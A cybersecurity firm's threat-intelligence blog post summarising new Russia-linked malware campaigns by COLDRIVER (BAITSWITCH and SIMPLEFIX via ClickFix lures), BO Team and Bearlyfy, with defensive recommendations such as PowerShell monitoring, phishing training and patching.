A major escalation in the ongoing Russia-focused cyber threat landscape has unfolded as the COLDRIVER group, alongside BO Team and Bearlyfy, launches new multi-stage malware campaigns. From the Wiseman Cybersec perspective, this coordinated surge represents both a technical evolution in attacker capabilities and a critical shift in the cyberwarfare dynamics impacting Russian, Western, and civil society targets.
The COLDRIVER Campaign: Arsenal Expansion
In September 2025, Zscaler ThreatLabz documented COLDRIVER, a Russia-linked APT also known as Star Blizzard, Callisto, and UNC4057, ramping up its operations with two new lightweight malware strains: BAITSWITCH and SIMPLEFIX. COLDRIVER’s attack chain leverages ClickFix, a social engineering technique that lures targets—often NGOs, journalists, and human rights activists in both the West and Russia—into running malicious code disguised as legitimate actions, such as completing CAPTCHA checks.
- BAITSWITCH acts as a downloader, fetching and executing the PowerShell-based SIMPLEFIX backdoor once a victim is deceived.
- SIMPLEFIX establishes persistence, collects system information, exfiltrates files, and communicates with remote C2S to execute further attacker-controlled scripts.
- Attacks demonstrate strong technical overlap and continuity with COLDRIVER’s previous operations (including the LOSTKEYS campaign), but with added capabilities to erase traces and harden against detection.
BO Team and Bearlyfy: Counteroffensive and New Tactics
In parallel, threat groups BO Team (aka Black Owl, Hoody Hyena) and Bearlyfy are waging sophisticated attacks inside Russia. Their campaigns target both public and private sectors:
- BO Team: Uses phishing to drop ransomware and backdoors (notably BrockenDoor and ZeronetKit), with recent campaigns leveraging new C# versions and Golang-based RATs for full system access, file transfer, and secure session creation.
- Bearlyfy: Leverages ransomware such as LockBit 3.0 and Babuk, with activity traced back to early 2025. Attacks have escalated from small businesses to major Russian firms, with ransom demands scaling from thousands to tens of thousands of euros.
Bearlyfy’s infrastructure shows technical overlap with pro-Ukrainian threat groups, yet evidence points to it being an independent actor. Notably, Bearlyfy attacks often exploit vulnerabilities in external services (e.g., Bitrix, Zerologon), favouring immediate impact over drawn-out espionage.
Analysis: The Implications for Cybersecurity and Geopolitics
- Multi-directional conflict: The concurrent escalation from COLDRIVER and anti-Russia groups like BO Team and Bearlyfy reveals an unprecedented three-way cyber battle, where both state and non-state actors employ advanced, offensive tradecraft against government, business, and civilian infrastructure.
- Technical sophistication: The integrated use of phishing lures, custom malware loaders, PowerShell backdoors, and multi-stage infection chains increases detection complexity, especially as campaigns target specific sectors and use evasive, trace-wiping features.
- Operational impact: Ransomware and data exfiltration campaigns within Russia signal a weakening of traditional cyber hygiene, indicating that even mature, state-backed systems are vulnerable to opportunistic and targeted breaches.
Wiseman Cybersec’s Recommendations
- Reinforce endpoint monitoring and behavioural analytics; prioritise visibility for PowerShell, registry, and persistence anomalies linked to BAITSWITCH/SIMPLEFIX and similar loaders.
- Accelerate phishing resilience with user training focusing on CAPTCHA-themed lures and atypical credential prompts.
- Patch external-facing applications aggressively, especially those known to be targeted by Bearlyfy and BO Team (e.g., Bitrix, VPN gateways).
- Share threat intelligence across national and sector borders. As offensive cyber capabilities proliferate among both state actors and hacktivist proxies, intelligence sharing is vital for incident prevention and response.
Conclusion
The emergence of COLDRIVER’s new malware alongside the disruptive activities of BO Team and Bearlyfy marks a pivotal evolution in Russia-focused cyber conflicts. Wiseman Cybersec urges organisations to move beyond conventional defence and engage layered, adaptive security measures—blending technical hardening with rapid threat intelligence collaboration—to defend against this fast-maturing, multi-front threat environment.
